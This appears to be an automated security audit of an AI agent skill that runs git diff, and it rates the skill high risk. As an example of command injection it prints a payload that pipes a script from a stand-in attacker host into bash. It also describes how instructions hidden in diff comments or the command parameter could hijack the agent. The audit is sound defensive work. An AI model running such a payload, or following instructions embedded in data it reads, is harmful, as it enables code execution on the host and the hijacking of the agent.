git_refactor_skill

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill explicitly states it uses git diff <git_commit> HEAD. The <git_commit> variable is directly interpolated into a shell command without sanitization. An attacker could provide input such as ; curl http://attacker.com/script | bash ; to achieve arbitrary code execution on the host machine.
  • [PROMPT_INJECTION] (HIGH): This skill is highly susceptible to Indirect Prompt Injection (Category 8).
      • Ingestion points: The output of the git diff command (SKILL.md).
      • Boundary markers: None are defined to separate the untrusted diff data from the agent's instructions.
      • Capability inventory: The skill performs command execution and is tasked with 'implementing refactoring,' which implies file-write or further command execution capabilities.
      • Sanitization: None. Malicious instructions embedded in the code history (e.g., as comments) could hijack the agent's logic during the analysis phase.
  • [PROMPT_INJECTION] (MEDIUM): The <command> parameter provides a direct injection vector. While the skill instructs the agent to follow the user's refactoring requirements, it lacks constraints to prevent the user from overriding the core logic or extracting sensitive information through this prompt.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 16, 2026, 10:39 AM